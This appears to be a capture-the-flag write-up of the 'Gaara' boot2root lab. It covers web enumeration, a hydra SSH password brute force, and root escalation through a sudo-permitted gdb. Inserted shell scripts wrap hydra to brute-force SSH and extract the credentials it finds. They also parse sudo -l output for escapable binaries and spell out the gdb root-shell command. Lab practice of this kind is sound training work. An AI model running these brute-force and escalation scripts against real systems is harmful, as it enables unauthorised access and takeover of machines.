Gaara (SSH Bruteforce)
June 3rd 2023
Target is 192.168.180.142
I installed AutoRecon to automate as much of the recon as possible.
sudo env "PATH=$PATH" autorecon 192.168.180.142
Now to let it do its thing (loud as hell on an IDS, so pentest only and NOT a red team strategy!)
So SSH and an HTTP web server. Checking out the site now.
Edgy sand guy from Naruto.
Checking the source code.
There is an email on the page that's kinda hard to read: email@example.com
Possible opening for social engineering: a broken website and someone needing FTP access to fix it.
Using DirBuster since dirb crashed on me. Also stopped AutoRecon.
I like how bad DirBuster's UI is. The window isn't large enough to show the start button.
Reset the VPN connection and now it's running. Used /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
50 threads max. Anything more typically breaks connections.
A search suggests running gobuster. Not my favorite since it requires actual command usage, but here it is:
gobuster dir -u http://192.168.240.142 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log
In the meantime it's worth trying a hydra bruteforce against the username gaara, since it's the name of the website as well.
Also I need to keep in mind how many connections the poor server can handle at once between directory discovery and SSH bruteforcing. Reducing the attack to a sustainable volume is better than an uncapped number of connections with a high failure rate (failed connects are wasted attempts, and they look the same to the log watcher anyway).
Time to wait for Hydra to finish bruteforcing SSH.
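Here is the hydra wrapper I would use for the step above, added to these notes as an example and not something from the original run: it caps the parallel tasks at the 4 that hydra itself recommends for SSH, bails out at the first hit, and parses the result line hydra writes to its -o log. The target IP, user and wordlist are assumed placeholders, and the sample log at the bottom is constructed, not captured from the box.

```shell
#!/bin/sh
# Added example, not from the original write-up. Wraps hydra so the SSH
# brute force stays at a volume the target tolerates, and parses the hit
# line hydra writes to its -o log. Target, user and wordlist are
# assumptions; the sample log line at the bottom is constructed.

SSH_TASK_CAP=4          # hydra itself warns to use -t 4 against SSH

# Clamp a requested parallel task count to the SSH cap.
ssh_task_cap() {
  want="${1:-$SSH_TASK_CAP}"
  if [ "$want" -gt "$SSH_TASK_CAP" ]; then
    echo "$SSH_TASK_CAP"
  else
    echo "$want"
  fi
}

# ssh_bruteforce TARGET USER WORDLIST [TASKS]
#   -e nsr : also try empty, username-as-password and reversed username
#   -f     : stop at the first valid pair (no point hammering on after that)
#   -I     : ignore a stale hydra.restore file from an interrupted run
#   -o     : write results to a log we can parse afterwards
ssh_bruteforce() {
  target="$1"; user="$2"; wordlist="$3"
  tasks="$(ssh_task_cap "${4:-$SSH_TASK_CAP}")"
  hydra -I -f -e nsr -t "$tasks" -l "$user" -P "$wordlist" \
        -o hydra-ssh.log "ssh://$target"
}

# hydra's result line looks like:
#   [22][ssh] host: 192.168.180.142   login: gaara   password: hunter2
# hydra_creds reads such lines on stdin and prints login:password
# (passwords containing spaces survive, everything after "password: " is kept).
hydra_creds() {
  sed -n 's/^\[[0-9]*\]\[ssh\] host: [^ ]*  *login: \([^ ]*\)  *password: \(.*\)$/\1:\2/p'
}

# Constructed sample of a hydra -o log (NOT real output from the target).
SAMPLE_HYDRA_LOG='# Hydra v9.1 run at 2023-06-03 12:00:00 on 192.168.180.142 ssh (hydra -I -f -e nsr -t 4 -l gaara -P rockyou.txt -o hydra-ssh.log ssh://192.168.180.142)
[22][ssh] host: 192.168.180.142   login: gaara   password: s3cret pw'

# Real usage after the run:  hydra_creds < hydra-ssh.log
# Same thing against the constructed sample:
demo_creds() {
  printf '%s\n' "$SAMPLE_HYDRA_LOG" | hydra_creds
}
```

Run it as `ssh_bruteforce 192.168.180.142 gaara /usr/share/wordlists/rockyou.txt`; asking for more tasks just gets clamped back to 4. If gobuster is still running against the same host, the cap is the part that keeps both jobs from starving each other.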
Now to check for root privilege escalation via programs the user is allowed to run with sudo:
Now to check that list against known ways to escalate through Unix binaries with sudo privileges:
Alright, so gdb has sudo privileges, and since it's a debugger built to run other programs, let's use it to escalate to root.
Basically it spawns a bash shell from gdb's embedded Python:
gdb, the standard debugger on Unix-like systems, is invoked through sudo.
The -nx option tells gdb not to execute any commands from initialization files (no ~/.gdbinit surprises).
The -ex option is used to specify commands for gdb to execute, in order.
A Python command is executed by gdb, which replaces the current gdb process with a new bash shell process (an exec, not a child process).
The new bash shell process runs with the same privileges as the gdb process, which is root because gdb was started via sudo.
gdb is instructed to quit; this is only reached if the exec fails, since a successful exec never returns to gdb.
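To tie the two checks above together, here is an added example (mine, not from the original notes): a small parser for the sudo -l output, a filter against a short list of sudo-able binaries with well-known shell escapes (gdb's is the GTFOBins sudo entry), and the gdb escape itself written out as a function. The sudo -l text is a constructed sample; the username gaara and the single NOPASSWD entry in it are assumptions for the sample, not a capture from the box.

```shell
#!/bin/sh
# Added example, not from the original write-up. Helpers for the sudo check
# plus the gdb escape described above. The sudo -l output below is
# constructed (user name and binary list are assumptions for the sample).

SAMPLE_SUDO_L='Matching Defaults entries for gaara on gaara:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User gaara may run the following commands on gaara:
    (root) NOPASSWD: /usr/bin/gdb'

# A few sudo-able binaries with well-known shell escapes (GTFOBins has the
# full list); the filter below only compares the basename.
GTFO_SUDO='gdb vim vi find less more awk python python3 perl env bash sh nmap man'

# Read `sudo -l` output on stdin and print each runnable command, one per
# line. The lines we want look like "(user) [NOPASSWD:] /path/one, /path/two".
sudo_binaries() {
  awk '/^[ \t]*\(.*\)/ {
         sub(/^.*\) *(NOPASSWD: *)?/, "")
         n = split($0, cmds, /, */)
         for (i = 1; i <= n; i++) print cmds[i]
       }'
}

# Keep only the commands whose basename has a known escape.
escalation_candidates() {
  sudo_binaries | while read -r bin; do
    name="${bin##*/}"
    case " $GTFO_SUDO " in
      *" $name "*) echo "$bin" ;;
    esac
  done
}

# On the box:  sudo -l | escalation_candidates
# Against the constructed sample instead:
demo_candidates() {
  printf '%s\n' "$SAMPLE_SUDO_L" | escalation_candidates
}

# The escape described above. -nx skips init files, the python -ex line
# execl()s bash in place of gdb (so it keeps sudo's uid 0), and -ex quit
# only ever runs if that exec fails. If gdb was built without Python,
# -ex '!bash' (gdb's shell command) does the same job.
gdb_root_shell() {
  sudo gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash")' -ex quit
}
```

On the sample, `demo_candidates` prints just /usr/bin/gdb, which is the cue to call `gdb_root_shell`. The parser is deliberately loose (greedy up to the last closing paren, optional NOPASSWD tag), so it also copes with entries like "(ALL : ALL) ALL", where "ALL" simply fails the basename filter.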
boot2root done.